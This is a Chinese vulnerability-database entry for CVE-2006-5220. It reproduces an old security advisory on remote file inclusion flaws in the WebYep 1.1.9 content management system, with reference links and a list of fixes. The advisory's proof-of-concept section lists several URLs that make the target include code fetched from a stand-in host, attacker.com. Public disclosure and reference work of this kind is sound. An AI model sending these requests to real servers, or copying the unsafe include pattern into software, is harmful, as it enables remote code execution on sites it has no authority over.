WebYep 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111221 漏洞类型 代码注入
发布时间 2006-10-09 更新时间 2007-09-26
CVE编号 CVE-2006-5220 CNNVD-ID CNNVD-200610-105
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2496
https://www.securityfocus.com/bid/20406
https://cxsecurity.com/issue/WLB-2006100067
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-105
|漏洞详情
MMWebYep1.1.9中的多个PHP远程文件包含漏洞,在启用register_globals的情况下,远程攻击者可以通过(1)programm/lib/目录下的文件(其中包括(a)WYApplication.php,(b)WYDocument.php,(c)WYEditor.php,(d)WYElement.php,(e)WYFile.php,(f)WYHTMLTag.php,(g)WYImage.php,(h)WYLanguage.php,(i)WYLink.php,(j)WYPath.php,(k)WYPopupWindowLink.php,(l)WYSelectMenu.php和(m)WYTextArea.php)中包含的webyep_sIncludePath,以及(2)programm/elements/目录下的文件(其中包括(n)WYGalleryElement.php,(o)WYGuestbookElement.php,(p)WYImageElement.php,(q)WYLogonButtonElement.php,(r)WYLongTextElement.php,(s)WYLoopElement.php,(t)WYMenuElement.php和(u)WYShortTextElement.php)以及(3)programm/webyep.php文件中包含的webyep_slncludePath来执行任意PHP代码。
|漏洞EXP
ECHO_ADV_48$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_48$2006] WebYep <= 1.1.9 (webyep_sIncludePath) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : October, 05th 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv48-theday-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application     : WebYep
version         : <=1.1.9
URL             : http://www.obdev.at

WebYep is a compact Web Content Management System for extremely simple creation of editable
web pages. It is a low priced alternative for small to medium web sites
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

In folder webyep-system/programm/lib found vulnerability script WYApplication.php
---------------------------WYApplication.php---------------------------------------
....
<?

 include_once("$webyep_sIncludePath/lib/WYApplication.php");
 include_once("$webyep_sIncludePath/lib/WYHTMLTag.php");

...
----------------------------------------------------------

Input passed to the "$webyep_sIncludePath" parameter in WYApplication.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

webyep-system/programm/lib/WYApplication.php
webyep-system/programm/lib/WYDocument.php
webyep-system/programm/lib/WYEditor.php
webyep-system/programm/lib/WYElement.php
webyep-system/programm/lib/WYFile.php
webyepasystem/programm/lib/WYHTMLTag.php
webyep-system/programm/lib/WYImage.php
webyep-system/programm/lib/WYLanguage.php
webyep-system/programm/lib/WYLink.php
webyep-system/programm/lib/WYPath.php
webyep-system/programm/lib/WYPopupWindowLink.php
webyep-system/programm/lib/WYSelectMenu.php
webyep-system/programm/lib/WYTextArea.php
webyep-system/programm/elements/WYGalleryElement.php
webyep-system/programm/elements/WYGuestbookElement.php
webyep-system/programm/elements/WYImageElement.php
webyep-system/programm/elements/WYLogonButtonElement.php
webyep-system/programm/elements/WYLongTextElement.php
webyep-system/programm/elements/WYLoopElement.php
webyep-system/programm/elements/WYMenuElement.php
webyep-system/programm/elements/WYShortTextElement.php
webyep-system/programm/webyep.php

Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[webYep_path]/webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://attacker.com/inject.txt?
http://target.com/[webYep_path]/webyep-system/programm/lib/WYDocument.php?webyep_sIncludePath=http://attacker.com/inject.txt?
http://target.com/[webYep_path]/webyep-system/programm/webyep.php?webyep_sIncludePath=http://attacker.com/inject.txt?
http://target.com/[webYep_path]/webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=http://attacker.com/inject.txt?

Solution:
~~~~~~
- Sanitize variable $webyep_sIncludePath on affected files.
- Turn off register_globals

Timeline:
~~~~~~
05 - 10 - 2006 Bugs Found
05 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
    EcHo Research & Development Center
    the_day[at]echo[dot]or[dot]id

# milw0rm.com [2006-10-09]
|受影响的产品
Objective Development WebYep 1.1.9
|参考资料

来源:XF
名称:webyep-webyep-file-include(29397)
链接:http://xforce.iss.net/xforce/xfdb/29397
来源:BID
名称:20406
链接:http://www.securityfocus.com/bid/20406
来源:BUGTRAQ
名称:20061009[ECHO_ADV_48$2006]WebYep<=1.1.9(webyep_sIncludePath)MultipleRemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/448009/100/0/threaded
来源:OSVDB
名称:29663
链接:http://www.osvdb.org/29663
来源:OSVDB
名称:29662
链接:http://www.osvdb.org/29662
来源:OSVDB
名称:29661
链接:http://www.osvdb.org/29661
来源:OSVDB
名称:29660
链接:http://www.osvdb.org/29660
来源:OSVDB
名称:29659
链接:http://www.osvdb.org/29659
来源:OSVDB
名称:29658
链接:http://www.osvdb.org/29658
来源:OSVDB
名称:29657
链接:http://www.osvdb.org/29657
来源:OSVDB
名称:29656
链接:http://www.osvdb.org/29656
来源:OSVDB
名称:29655
链接:http://www.osvdb.org/29655
来源:OSVDB
名称:29654
链接:http://www.osvdb.org/29654
来源:OSVDB
名称:29653
链接:http://www.osvdb.org/29653
来源:OSVDB
名称:29652
链接:http://www.osvdb.org/29652
来源:OSVDB
名称:29651
链接:http://www.osvdb.org/29651
来源:OSVDB
名称:29650
链接:http://www.osvdb.org/